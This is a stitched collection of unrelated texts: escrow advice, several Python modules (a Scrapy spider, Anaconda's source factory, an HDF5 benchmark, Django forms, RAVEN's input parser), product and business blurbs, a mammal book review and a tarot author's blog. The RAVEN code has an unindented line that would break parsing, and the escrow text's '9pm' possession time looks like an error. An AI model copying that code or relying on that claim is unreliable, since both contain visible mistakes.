Prior to signing, the escrow company will set an appointment with you to come in and sign documents. It can be done at their office or your home. They will also give you the total amount of funds you will receive. These funds are usually dispersed in the form of a certified or cashiers check or can be wired to your designated bank. The closing broker (escrow) will then process the paperwork and send to the King County Courthouse the appropriate documents. Once the courthouse has processed and assigned recording numbers, they will notify escrow who will place a call to all parties that the transaction has recorded.
As far as possession is concerned, this can get very vague and confusing when it really shouldn’t be. Legal possession can only occur when the deed is recorded and funds disbursed. The gray area is what time of day is this going to occur. 9am? Noon? 2pm? To protect everyone’s interest, this specification can be mentioned on the purchase and sale agreement. If nothing has been agreed upon, 9pm is the legal possession time.
|
__author__ = 'juraseg'
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request
from product_spiders.items import Product, ProductLoader
import logging
class ComeCoUkSpider(BaseSpider):
    """Scrapes comet.co.uk for Sagemcom-related products.

    Crawls keyword search-result pages (following pagination) plus a
    fixed list of known product detail URLs, yielding Product items.
    """

    name = 'comet.co.uk'
    allowed_domains = ['comet.co.uk']
    start_urls = (
        'http://www.comet.co.uk/',
    )
    search_url = 'http://www.comet.co.uk/webapp/wcs/stores/servlet/SearchResultsDisplayView?storeId=10151&catalogId=10002&langId=-1&searchTerm='
    keywords = ['Sagemcom', 'Sagem']
    products = [
        'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-HDR-FOX-T2-Freeview-freesat-Recorder/680052',
        'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-HDR-FOX-T2/1TB-Freeview-freesat-Recorder/735736',
        'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-FOXSAT-HDR500-Freeview-freesat-Recorder/712930',
        'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-PANASONIC-DMR-HW100EBK-Freeview-freesat-Recorder/767913',
        'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAMSUNG-SMT-S7800-Freeview-freesat-Recorder/701467',
        'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAGEMCOM-RTI90-320-Freeview-freesat-Recorder/621994',
        'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-PVR9300T/500-Freeview-freesat-Recorder/787388',
        'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SONY-SVRHDT500B.CEK-Freeview-freesat-Recorder/700665',
        'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAGEMCOM-RTI95-320-Freeview-freesat-Recorder/664121',
        'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-PHILIPS-HDTP8530-Freeview-freesat-Recorder/600339',
    ]

    def start_requests(self):
        """Seed one search request per keyword plus the fixed product pages."""
        for keyword in self.keywords:
            yield Request(self.search_url + keyword, callback=self.parse_search)
        for url in self.products:
            yield Request(url, callback=self.parse_product)

    def _load_product(self, response, name, url, price):
        """Shared ProductLoader assembly for both parse paths (was
        duplicated verbatim in parse_product and parse_search).

        NOTE(review): the product name doubles as the identifier, so two
        products with the same title collide -- confirm intended.
        """
        l = ProductLoader(item=Product(), response=response)
        l.add_value('identifier', name)
        l.add_value('name', name)
        l.add_value('url', url)
        l.add_value('price', price)
        return l.load_item()

    def parse_product(self, response):
        """Extract a single product from its detail page; logs and skips
        pages missing a name or price."""
        hxs = HtmlXPathSelector(response)
        url = response.url

        name = hxs.select("//div[@id='product-content']//div[@id='product-header']/h1//text()").extract()
        if not name:
            logging.error("ERROR! NO NAME! %s" % url)
            return
        # The title is split across several text nodes; rejoin them.
        name = " ".join(name)

        price = hxs.select("//div[@id='product-content']//div[@id='productPrice']//p[@id='product-price']/text()").extract()
        if not price:
            logging.error("ERROR! NO PRICE! %s %s" % (url, name))
            return
        price = price[0]

        yield self._load_product(response, name, url, price)

    def parse_search(self, response):
        """Extract products from a search results page and follow its
        pagination links (re-entering this callback)."""
        hxs = HtmlXPathSelector(response)

        # parse pages
        for page in hxs.select("//ul[@id='pagination']/li/a/@href").extract():
            yield Request(page, callback=self.parse_search)

        # parse products
        for item in hxs.select("//div[@class='column_one grid_list']/div"):
            name = item.select("div/div[@class='info']/div/h2/a/text()").extract()
            if not name:
                # Non-product container rows have no link text; skip quietly.
                continue
            name = name[0]

            url = item.select("div/div[@class='info']/div/h2/a/@href").extract()
            if not url:
                logging.error("ERROR! NO URL! URL: %s. NAME: %s" % (response.url, name))
                continue
            url = url[0]

            price = item.select("div/div[@class='pricebox']/p[@id='product-price']/text()").extract()
            if not price:
                logging.error("ERROR! NO PRICE! URL: %s. NAME: %s" % (response.url, name))
                continue
            price = price[0]

            yield self._load_product(response, name, url, price)
|
Du kan ringe til os 24-timer i døgnet, alle ugens dage.
Dalhoff Travel has compiled a series of links in which you will find information on everything from vaccines and VISAs, to flight schedules and packing tips.
All online payments are handled by ePay. All communications and data are encrypted.
It is a good idea to be well prepared to ensure a successful journey. Read DRF Travel advice.
Tina Dalhoff created a thriving travel agency for businesses with five other staff members and won the Gazelle Award for two consecutive years.
Tina Dalhoff was born and raised in Holbæk, Denmark. After working in this industry for 27 years with Travel Center A/S, Skibby Business Travel and FDM Travel in Holbæk, she accomplished her dream of starting her own travel agency for businesses.
|
#
# Factory class to create sources.
#
# Copyright (C) 2020 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pyanaconda.modules.payloads.constants import SourceType
__all__ = ["SourceFactory"]
class SourceFactory(object):
    """Factory to create payload sources."""

    @staticmethod
    def create_source(source_type: SourceType):
        """Create a source module.

        The concrete source classes are imported lazily so that only the
        dependencies of the requested source type are loaded.

        :param source_type: a source type
        :return: a source module
        :raise ValueError: if the source type is not recognized
        """
        # Every branch returns, so uniform if-guards are used throughout
        # (the original mixed 'elif' and 'if').
        if source_type == SourceType.LIVE_OS_IMAGE:
            from pyanaconda.modules.payloads.source.live_os.live_os import LiveOSSourceModule
            return LiveOSSourceModule()

        if source_type == SourceType.CDROM:
            from pyanaconda.modules.payloads.source.cdrom.cdrom import CdromSourceModule
            return CdromSourceModule()

        if source_type == SourceType.HMC:
            from pyanaconda.modules.payloads.source.hmc.hmc import HMCSourceModule
            return HMCSourceModule()

        raise ValueError("Unknown source type: {}".format(source_type))
|
Bandaid Packaged Deals - Buy an assortment at one low price!
Order an assortment of quality adhesive bandages (Bandaids) at one low price.
6300 - 100 Heavy Duty Fabric Strip Bandages 7/8" x 3"
6302 - 40 Heavy Duty Fabric Fingertip Bandages 1 3/4" x 2"
6304 - 40 Heavy Duty Fabric Knuckle Bandages 2" x 3"
6306 - 25 Heavy Duty Large Patch Bandages 2" x 3"
Heavy Duty Fabric Fingertip Bandage - 1 3/4" x 2 "
Heavy Duty Fabric Strip Adhesive Bandages 7/8" x 3"
|
"""Small benchmark on the effect of chunksizes and compression on HDF5 files.
Francesc Alted
2007-11-25
"""
from __future__ import print_function
import os
import math
import subprocess
import tempfile
from time import time
import numpy
import tables
# Size of dataset: N rows are appended, each holding M float64 values
# (8 bytes per element), so total size is N * M * 8 bytes.
# N, M = 512, 2**16 # 256 MB
# N, M = 512, 2**18 # 1 GB
# N, M = 512, 2**19 # 2 GB
N, M = 2000, 1000000 # 15 GB
# N, M = 4000, 1000000 # 30 GB
datom = tables.Float64Atom() # elements are double precision
def quantize(data, least_significant_digit):
    """Quantize data to improve compression.

    Values are rounded as around(scale*data)/scale, where scale is 2**bits
    and bits is derived from least_significant_digit.  For example, for
    least_significant_digit=1, bits will be 4.
    """
    precision = 10. ** -least_significant_digit
    exponent = math.log(precision, 10)
    # round the exponent away from zero before deriving the bit count
    exponent = int(math.floor(exponent)) if exponent < 0 else int(math.ceil(exponent))
    bits = math.ceil(math.log(10. ** -exponent, 2))
    scale = 2. ** bits
    return numpy.around(scale * data) / scale
def get_db_size(filename):
    """Return the allocated on-disk size of *filename* as reported by
    ``ls -sh`` (first token of the output, as bytes).

    Uses an argument list instead of an interpolated shell string, so the
    filename cannot be misinterpreted by the shell.
    """
    output = subprocess.check_output(["ls", "-sh", filename])
    return output.split()[0]
def bench(chunkshape, filters):
    """Benchmark one (chunkshape, filters) combination.

    Creates a temporary HDF5 file holding an N x M float64 EArray, then
    prints the creation time, the on-disk size, the sequential read time
    and the random read time.  The file lands wherever tempfile puts it,
    i.e. the file system backing the default temp directory.
    """
    numpy.random.seed(1)  # fixed seed so results are reproducible
    filename = tempfile.mktemp(suffix='.h5')
    print("Doing test on the file system represented by:", filename)
    f = tables.open_file(filename, 'w')
    e = f.create_earray(f.root, 'earray', datom, shape=(0, M),
                        filters = filters,
                        chunkshape = chunkshape)
    # Fill the array row by row
    t1 = time()
    for i in range(N):
        # e.append([numpy.random.rand(M)])  # use this for less compressibility
        # quantizing the random data makes it more compressible
        e.append([quantize(numpy.random.rand(M), 6)])
    # os.system("sync")
    print("Creation time:", round(time() - t1, 3), end=' ')
    filesize = get_db_size(filename)
    filesize_bytes = os.stat(filename)[6]  # index 6 is st_size
    print("\t\tFile size: %d -- (%s)" % (filesize_bytes, filesize))
    # Read in sequential mode:
    e = f.root.earray
    t1 = time()
    # Flush everything to disk and flush caches
    #os.system("sync; echo 1 > /proc/sys/vm/drop_caches")
    for row in e:
        t = row
    print("Sequential read time:", round(time() - t1, 3), end=' ')
    # f.close()
    # return
    # Read in random mode:
    i_index = numpy.random.randint(0, N, 128)
    j_index = numpy.random.randint(0, M, 256)
    # Flush everything to disk and flush caches
    #os.system("sync; echo 1 > /proc/sys/vm/drop_caches")
    # Protection against too large chunksizes -- NOTE: currently disabled by
    # the leading 0 in the condition below
    # 4 MB
    if 0 and filters.complevel and chunkshape[0] * chunkshape[1] * 8 > 2 ** 22:
        f.close()
        return
    t1 = time()
    for i in i_index:
        for j in j_index:
            t = e[i, j]
    print("\tRandom read time:", round(time() - t1, 3))
    f.close()
# Benchmark with different chunksizes and filters
# for complevel in (0, 1, 3, 6, 9):
for complib in (None, 'zlib', 'lzo', 'blosc'):
# for complib in ('blosc',):
    if complib:
        filters = tables.Filters(complevel=5, complib=complib)
    else:
        filters = tables.Filters(complevel=0)
    print("8<--" * 20, "\nFilters:", filters, "\n" + "-" * 80)
    # for ecs in (11, 14, 17, 20, 21, 22):
    for ecs in range(10, 24):
    # for ecs in (19,):
        chunksize = 2 ** ecs
        chunk1 = 1
        # Use floor division: plain '/' is true division under Python 3
        # (this file targets both, cf. the __future__ import), which would
        # make the chunkshape and the KB label floats.
        chunk2 = chunksize // datom.itemsize
        if chunk2 > M:
            chunk1 = chunk2 // M
            chunk2 = M
        chunkshape = (chunk1, chunk2)
        cs_str = str(chunksize // 1024) + " KB"
        print("***** Chunksize:", cs_str, "/ Chunkshape:", chunkshape, "*****")
        bench(chunkshape, filters)
|
If I have to worship something, I'll take the mammals. After all, they were the first things humans worshipped, and it seems right that after a few deluded centuries of praying to Gods who were just mean old men, we come back to the joyful polytheism of our ancestors, whose greatest wish was to be transformed into a deer, wolf or bear. The mammal cult has been making steady progress, slipping under the cultural radar. Every Gary Larson cartoon is another vote for the mammals, as is every dorm room with orca or wolf posters. There's an ideological mass reaching the critical point here, ready to force its way through the standard pieties.
But it needs some help in the print propaganda department, because it's amazingly difficult to find a good guide to the world's mammals. Instead, all you find is shelves full of books about birds. I'm not taking anything away from the birds. I'm not saying they're a bunch of showboating leftover dinosaurs with a T. Rex complex, strutting their plumes in the certainty that they can fly away if anything serious happens. Nor am I suggesting that their corny nest-building activity is a specious testimony to the middle-class nuclear family, reassuring suburbanites that the sitcom order of life is rooted in Nature.
All I'm saying is, how about a little mammal solidarity here?
It's coming, though too slowly. It's coalescing; you can see it in the way people react to news items. For example, there was a great story last week about some marine biologists in Point Reyes watching a mother Orca attack and kill a Great White Shark, then use the corpse to teach her calf to feed. Everybody I told about that story had the same reaction: "Yay! Yay for her!" That's mammal solidarity, and Mammals should serve as the new/old creed's holy scripture.
Mammals is one of a series of handbooks put together in a very efficient, readable format by the English publishers Dorling Kindersley. In less than 400 pages, you get brief, punchy descriptions and photos of over 450 species of mammal, with information on the diet, social unit, gestation period and family tree of each. Most important, you also get a report on the status of the species, from "common" to "critically endangered."
Open this book at random and you're guaranteed to find something wonderful. I happened to open it to page 181, and found a picture of what may well be the ugliest mammal extant, the Naked Mole Rat. The species description was astonishing: "With hairless, loose pinkish-grey skin and vestigial ears and minute eyes, this unusual looking, nocturnal rodent has a unique social system. It lives in colonies of 70-80, with a dominant female 'queen' that breeds and is tended by several non-workers, while the workers form head-to-tail digging chains in food-gathering galleries that radiate up to 40m (130 ft) from the central chamber."
I thought I knew mammals pretty well -- I was one of those kids who took the nature documentaries very seriously -- and I'd heard of the Mole Rat a few times, but I had no idea it lived in a queen-centered underground colony, like ants and termites do. That's the sort of delightful shock you encounter on nearly every page of this book. You come away awed by the sheer versatility of us hairy little milk-sucking adventurists.
For example, I had no idea there were so many gliding mammals. Not "flying"; bats are the only mammals who actually fly; but gliding on skin membranes through virtually all the forests of Earth, from New York to Borneo. The Malayan Flying Lemur, the best glider in Mammalia, can swoop 330 feet between trees without losing altitude. The Giant Flying Squirrel glides from Eastern Afghanistan to Borneo -- not in one glide, you understand -- by opening its blanket-like membrane, an animate flying carpet half a meter long. God, they're all so incredibly great! And there are hundreds of these gliders! Yet without a book like this we'd never know about them, because they're very quiet, and of course humans rarely look up.
|
from django.forms import *
from django.forms.widgets import *
from django.forms.extras.widgets import *
from vizwall.events.models import Event, COMPONENT_CHOICES, dTimeFieldInputs
import datetime
from vizwall.accounts.models import UserProfile
from captcha.fields import CaptchaField
class EventForm(ModelForm):
    '''Event form, customized to show normal Anonymous view.

    Adds a captcha for anonymous submitters and validates that the requested
    date/duration does not overlap an already-published event.
    '''
    event_date = DateTimeField(required=True, initial=None, input_formats=dTimeFieldInputs, help_text='Please use the date selector and check the calendar for available times!')
    captcha = CaptchaField()

    class Meta:
        model = Event
        #fields = ()
        exclude = ('event_last_modified', 'event_req_date',
                   'event_pub_date', 'event_is_published', 'event_assigned_proctors',
                   'event_is_declined')
        widgets = {
            'event_detail': Textarea(attrs={'cols': 35, 'rows': 5}),
            'event_components_vizwall': CheckboxInput(),
            'event_components_3dtv': CheckboxInput(),
            'event_components_omni': CheckboxInput(),
            'event_components_hd2': CheckboxInput(),
            'event_components_smart': CheckboxInput(),
        }

    def __init__(self, *args, **kwargs):
        # 'event_id' (given when editing an existing event) lets the conflict
        # check exclude the event itself.
        self.event_id = kwargs.pop('event_id') if kwargs.get('event_id') else None
        super(EventForm, self).__init__(*args, **kwargs)

    # BUGFIX: these hooks were named clean_event_component_* (singular) while
    # the fields are event_components_* (plural, matching the Meta.widgets
    # keys), so Django never invoked them.  Renamed to match the field names.
    def clean_event_components_vizwall(self):
        return bool(self.cleaned_data['event_components_vizwall'])

    def clean_event_components_omni(self):
        return bool(self.cleaned_data['event_components_omni'])

    def clean_event_components_3dtv(self):
        return bool(self.cleaned_data['event_components_3dtv'])

    def clean_event_components_hd2(self):
        return bool(self.cleaned_data['event_components_hd2'])

    def clean_event_components_smart(self):
        return bool(self.cleaned_data['event_components_smart'])

    def clean_event_date(self):
        '''Checks the requested date against current events for conflicts.

        Raises a ValidationError if another published event overlaps, else
        passes validation and returns the cleaned date unchanged.
        '''
        reqDate = self.cleaned_data['event_date']
        reqDuration = self.cleaned_data['event_duration']
        conflict = self.checkConflict(reqDate, reqDuration)
        if conflict and conflict.pk != self.event_id:
            # BUGFIX: 'forms' is not a bound name in this module (it only
            # star-imports django.forms), so raise ValidationError directly.
            raise ValidationError("This event Conflicts with another event: \"%s\" between %s-%s - ID# %s" % ('\n'+conflict.event_title, conflict.event_date.strftime('%H:%M'), conflict.get_end_date().strftime('%H:%M'), conflict.pk))
        # always return the cleaned data, whether it was changed or not
        return reqDate

    def inRange(self, begin, duration, eventStart, eventDuration):
        '''Checks if date ranges overlap - pads 1 minute off end times.'''
        end = begin + datetime.timedelta(minutes=duration-1)
        eventEnd = eventStart + datetime.timedelta(minutes=int(eventDuration)-1)
        # Two ranges overlap iff each starts before the other ends.
        # (BUGFIX: the old endpoint-only check missed the case where one
        # range fully contains the other.)
        return begin <= eventEnd and eventStart <= end

    def checkConflict(self, reqDate, reqDuration):
        '''Checks currently scheduled, published events for a conflict.

        Returns the first conflicting Event (truthy) or False.
        '''
        tom = reqDate + datetime.timedelta(days=2)  # make sure full day tomorrow is included
        daysEvents = Event.objects.all().filter(
            event_date__gte=datetime.date(reqDate.year, reqDate.month, reqDate.day),
            event_date__lte=datetime.date(tom.year, tom.month, tom.day),
            event_is_published=True)
        if self.event_id:
            # editing an existing event: don't let it conflict with itself
            daysEvents = daysEvents.exclude(pk=self.event_id)
        for event in daysEvents:
            if self.inRange(event.event_date, event.event_duration, reqDate, reqDuration):
                # conflict exists, return the conflicting event (~bool True)
                return event
        # no conflicts, valid event time (~bool False)
        return False
class DynamicMultipleChoiceField(MultipleChoiceField):
    '''Removes default django validation that values are in choices option,
    so choices may be populated dynamically at render time.'''

    def validate(self, value):
        # Only enforce "required"; deliberately skip the valid-choice check.
        if self.required and not value:
            # BUGFIX: 'forms' is not a bound name in this module (it only
            # star-imports django.forms), so raise ValidationError directly.
            raise ValidationError(self.error_messages['required'])
class EventFormAdmin(EventForm):
    '''Admin variant of EventForm: exposes the publish/decline flags and
    proctor assignment, and drops the captcha requirement.'''

    class Meta:
        model = Event
        exclude = ('event_pub_date', 'event_req_date', 'event_last_modified', 'event_assigned_proctors', 'captcha')
        widgets = {
            'event_detail': Textarea(attrs={'cols': 35, 'rows': 5}),
            'event_components_vizwall': CheckboxInput(),
            'event_components_3dtv': CheckboxInput(),
            'event_components_omni': CheckboxInput(),
            'event_components_hd2': CheckboxInput(),
            'event_components_smart': CheckboxInput(),
            'event_is_published': CheckboxInput(),
            'event_is_declined': CheckboxInput(),
        }

    # representing the manytomany related field in Event
    proctors = DynamicMultipleChoiceField(required=False)

    def __init__(self, *args, **kwargs):
        super(EventFormAdmin, self).__init__(*args, **kwargs)
        # BUGFIX: Meta.exclude only removes *model* fields; 'captcha' is a
        # form-level field declared on EventForm, so it must be removed
        # explicitly or admins would still be forced to solve a captcha.
        self.fields.pop('captcha', None)

    def clean_proctors(self):
        return self.cleaned_data['proctors']
|
Chicago Daily Law Bulletin: What types of pro bono work do you do?
For Chuhak & Tecson principal Dan Fumagalli, pro bono work is an important part of his practice. Find out what type of pro bono work he does in a recent Chicago Daily Law Bulletin Q&A.
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Mar 10, 2015
@author: talbpaul
"""
from __future__ import division, print_function, unicode_literals, absolute_import
import os
import sys
import numpy as np
from utils import mathUtils
# numpy with version 1.14.0 and upper will change the floating point type and print
# https://docs.scipy.org/doc/numpy-1.14.0/release.html
if int(np.__version__.split('.')[1]) > 13:
np.set_printoptions(**{'legacy':'1.13'})
def _reprIfFloat(value):
  """
    Uses repr if the value is a float, otherwise str.
    @ In, value, any, the value to convert to a string
    @ Out, _reprIfFloat, string, a string conversion of this
  """
  # repr preserves full float precision; str is fine for everything else
  return repr(value) if mathUtils.isAFloat(value) else str(value)
class GenericParser():
  """
    Imports the user-edited input file(s) and builds, per file, a list of
    string segments with replaceable parts.  Wildcards look like
    $RAVEN-var$, optionally carrying a default value and/or a format spec:
    $RAVEN-var:default|format$.
  """
  def __init__(self,inputFiles,prefix='$RAVEN-',postfix='$',defaultDelim=':', formatDelim='|'):
    """
      Accept the input file and parse it by the prefix-postfix breaks. Someday might be able to change prefix,postfix,defaultDelim from input file, but not yet.
      @ In, inputFiles, list, string list of input filenames that might need parsing.
      @ In, prefix, string, optional, the string prefix to find input variables within the input files
      @ In, postfix, string, optional, the string postfix signifying the end of an input variable within an input file
      @ In, defaultDelim, string, optional, the string used between prefix and postfix to set default values
      @ In, formatDelim, string, optional, the string used between prefix and postfix to set the format of the value
      @ Out, None
    """
    self.inputFiles = inputFiles
    self.prefixKey=prefix
    self.postfixKey=postfix
    self.varPlaces = {} # varPlaces[var][inputFile]: segment indices where var is substituted
    self.defaults = {} # defaults[var][inputFile]: default value for var
    self.formats = {} # formats[var][inputFile]: (format spec, caster callable)
    self.acceptFormats = {"d":int,"e":float,"E":float,"f":float,"F":float,"g":float,"G":float}
    self.segments = {} # segments[inputFile]: alternating literal-text / var-name pieces
    self.printTag = 'GENERIC_PARSER'
    for inputFile in self.inputFiles:
      infileName = inputFile.getFilename()#os.path.basename(inputFile)
      self.segments[infileName] = []
      if not os.path.exists(inputFile.getAbsFile()):
        ## Make sure to cast the inputFile to a string as it may be File object.
        raise IOError('Input file not found: ' + str(inputFile))
      seg = ''
      lines = inputFile.readlines()
      inputFile.close()
      for line in lines:
        # consume every $RAVEN-...$ wildcard on this line, left to right
        while self.prefixKey in line and self.postfixKey in line:
          self.segments[infileName].append(seg)
          start = line.find(self.prefixKey)
          end = line.find(self.postfixKey,start+1)
          var = line[start+len(self.prefixKey):end]
          # a wildcard may carry ':default' and/or '|format' after the name
          if defaultDelim in var or formatDelim in var:
            optionalPos = [None]*2
            optionalPos[0], optionalPos[1] = var.find(defaultDelim), var.find(formatDelim)
            # sys.maxsize marks "delimiter absent" so min()/comparisons work
            if optionalPos[0] == -1:
              optionalPos[0] = sys.maxsize
            if optionalPos[1] == -1:
              optionalPos[1] = sys.maxsize
            # default and format may appear in either order; slice accordingly
            defval = var[optionalPos[0]+1:min(optionalPos[1],len(var))] if optionalPos[0] < optionalPos[1] else var[min(optionalPos[0]+1,len(var)):len(var)]
            varformat = var[min(optionalPos[1]+1,len(var)):len(var)] if optionalPos[0] < optionalPos[1] else var[optionalPos[1]+1:min(optionalPos[0],len(var))]
            var = var[0:min(optionalPos)]
            if var in self.defaults.keys() and optionalPos[0] != sys.maxsize:
              print('multiple default values given for variable',var)
            if var in self.formats.keys() and optionalPos[1] != sys.maxsize:
              print('multiple format values given for variable',var)
            #TODO allow the user to specify take-last or take-first?
            if var not in self.defaults.keys() and optionalPos[0] != sys.maxsize:
              self.defaults[var] = {}
            if var not in self.formats.keys() and optionalPos[1] != sys.maxsize:
              self.formats[var ] = {}
            if optionalPos[0] != sys.maxsize:
              self.defaults[var][infileName]=defval
            if optionalPos[1] != sys.maxsize:
              # check if the format is valid: either a plain integer field
              # width, or a spec containing one of the accepted type letters
              if not any(formVal in varformat for formVal in self.acceptFormats.keys()):
                try:
                  int(varformat)
                except ValueError:
                  raise ValueError("the format specified for wildcard "+ line[start+len(self.prefixKey):end] +
                                   " is unknown. Available are either a plain integer or the following "+" ".join(self.acceptFormats.keys()))
                self.formats[var][infileName ]=varformat,int
              else:
                for formVal in self.acceptFormats.keys():
                  if formVal in varformat:
                    self.formats[var][infileName ]=varformat,self.acceptFormats[formVal]; break
          self.segments[infileName].append(line[:start])
          self.segments[infileName].append(var)
          # remember where this variable's placeholder segment sits
          if var not in self.varPlaces.keys():
            self.varPlaces[var] = {infileName:[len(self.segments[infileName])-1]}
          elif infileName not in self.varPlaces[var].keys():
            self.varPlaces[var][infileName]=[len(self.segments[infileName])-1]
          else:
            self.varPlaces[var][infileName].append(len(self.segments[infileName])-1)
          #self.segments.append(line[end+1:])
          line=line[end+1:]
          seg = ''
        else:
          # while-else: runs when the line has no (more) wildcards, so the
          # remaining text accumulates into the current literal segment
          seg+=line
      self.segments[infileName].append(seg)
  def modifyInternalDictionary(self,**Kwargs):
    """
      Edits the parsed file stored in self.segments to enter new variable values preparatory to a new run.
      @ In, **Kwargs, dict, dict including 'SampledVars' (the dictionary of variable:value to replace) and 'additionalEdits'.
      @ Out, None
    """
    modDict = Kwargs['SampledVars']
    self.adlDict = Kwargs.get('additionalEdits',{})
    # collect all variables that are I/O placeholders rather than sampled
    # values; those are filled in later by writeNewInput
    ioVars = []
    for value in self.adlDict.values():
      if type(value)==dict:
        for k in value.keys():
          ioVars.append(k)
      elif type(value)==list:
        for v in value:
          ioVars.append(v)
      else:
        ioVars.append(value)
    for var in self.varPlaces.keys():
      for inputFile in self.segments.keys():
        for place in self.varPlaces[var][inputFile] if inputFile in self.varPlaces[var].keys() else []:
          if var in modDict.keys():
            if var in self.formats.keys():
              if inputFile in self.formats[var].keys():
                if any(formVal in self.formats[var][inputFile][0] for formVal in self.acceptFormats.keys()):
                  # typed format spec: cast the value, then apply str.format
                  formatstringc = "{:"+self.formats[var][inputFile][0].strip()+"}"
                  self.segments[inputFile][place] = formatstringc.format(self.formats[var][inputFile][1](modDict[var]))
                else:
                  # plain integer spec: right-justify to that field width
                  self.segments[inputFile][place] = _reprIfFloat(modDict[var]).strip().rjust(self.formats[var][inputFile][1](self.formats[var][inputFile][0]))
            else:
              self.segments[inputFile][place] = _reprIfFloat(modDict[var])
          elif var in self.defaults.keys():
            if var in self.formats.keys():
              if inputFile in self.formats[var].keys():
                if any(formVal in self.formats[var][inputFile][0] for formVal in self.acceptFormats.keys()):
                  formatstringc = "{:"+self.formats[var][inputFile][0].strip()+"}"
                  self.segments[inputFile][place] = formatstringc.format(self.formats[var][inputFile][1](self.defaults[var][inputFile]))
                else:
                  self.segments[inputFile][place] = _reprIfFloat(self.defaults[var][inputFile]).strip().rjust(self.formats[var][inputFile][1](self.formats[var][inputFile][0]))
            else:
              self.segments[inputFile][place] = self.defaults[var][inputFile]
          elif var in ioVars:
            continue #this gets handled in writeNewInput
          else:
            raise IOError('Generic Parser: Variable '+var+' was not sampled and no default given!')
  def writeNewInput(self,inFiles,origFiles):
    """
      Generates a new input file with the existing parsed dictionary.
      @ In, inFiles, list, Files list of new input files to return
      @ In, origFiles, list, the original list of Files, used for key names
      @ Out, None
    """
    #get the right IO names put in
    case = 'out~'+inFiles[0].getBase() #FIXME the first entry? This is bad! Forces order somewhere in input file
                                       # however, I can't seem to generate an error with this, so maybe it's okay
    def getFileWithExtension(fileList,ext):
      """
        Just a script to get the file with extension ext from the fileList.
        @ In, fileList, list, the Files list of files to pick from.
        @ In, ext, string, the string extension that the desired filename ends with.
        @ Out, (index, inputFile), tuple, position and File object of the match
      """
      found=False
      for index,inputFile in enumerate(fileList):
        if inputFile.getExt() == ext:
          found=True
          break
      if not found:
        raise IOError('No InputFile with extension '+ext+' found!')
      return index,inputFile
    # substitute the I/O placeholder variables recorded in additionalEdits
    for var in self.varPlaces.keys():
      for inputFile in self.segments.keys():
        for place in self.varPlaces[var][inputFile] if inputFile in self.varPlaces[var].keys() else []:
          for iotype,adlvar in self.adlDict.items():
            if iotype=='output':
              if var==self.adlDict[iotype]:
                self.segments[inputFile][place] = case
                break
            elif iotype=='input':
              if var in self.adlDict[iotype].keys():
                self.segments[inputFile][place] = getFileWithExtension(inFiles,self.adlDict[iotype][var][0].strip('.'))[1].getAbsFile()
                break
    #now just write the files.
    for f,inFile in enumerate(origFiles):
      outfile = inFiles[f]
      #if os.path.isfile(outfile.getAbsFile()): os.remove(outfile.getAbsFile())
      outfile.open('w')
      outfile.writelines(''.join(self.segments[inFile.getFilename()]))
      outfile.close()
|
I am home again from the Massachusetts "Seasons of Witchery" tour and it went great! My husband Ken, and I took the last day and played tourist and visited Gloucester and Rockport Massachusetts. Yes indeed we had lob-stah rolls for lunch! In a fun restaurant on the water- where we watched the lobster boats coming in with their catch. Here is a picture of us at the beach in Rockport.
I have spent the past few days catching back up on correspondence and paperwork, and things are starting to settle down. I have new orders for Garden Witch Pentacles to fill, and some 2014 Llewellyn annual articles to write. (It keeps me busy while I wait to hear about my latest book proposal to Llewellyn.) Fingers crossed.
Today I posted a snapshot of the Witches Tarot book, the card back, and a sampling of the cards on Facebook. Here is the picture. The boxed sets just hit the Llewellyn warehouse last week, so they will be all ready to go on September 8th, the official release day!
Recently I saw a post on the Llewellyn blog, from a person complaining that the Witches Tarot deck lacked "diversity" and was nothing but "white people".
This yanked my chain for a couple of reasons. First and foremost because it is simply not the case. So, I took a deep breath and politely responded, informing the post-ee that they were incorrect.
The angel in the Lovers card is in fact- Asian.
Furthermore, Themis who is portrayed in the Justice Major Arcana card, (Pictured to the right) has gorgeous caramel/ golden colored skin and black curly hair with highlights.
I invited the person to take a closer look at the Witches Tarot Facebook page where they could see a large image of the Page of Pentacles, who is stunning and who is- by the way- a young woman of color.
I also noted that the 3 of Pentacles, the Knight of Pentacles, and the Queen of Pentacles are all beautiful people of color. Actually the 3 of Pentacles is one of my favorite cards in the entire deck! There is a sorcerer's apprentice vibe to this particular card. Just wait until you see him!
Honestly when I designed and scripted the Witches Tarot it only made sense to me to have some diversity in the deck art. The artist Mark, and I had several conversations about this topic.
To my delight I noticed when I came back from touring there was a new post on the Llewellyn blog. Where the person noted that they had gone and looked at the website and the Facebook pages. That they were "super pleased", and then they added,"Thanks, I am glad I was wrong about that!"
I am thrilled that they took the time to look again and are happy with what they see.
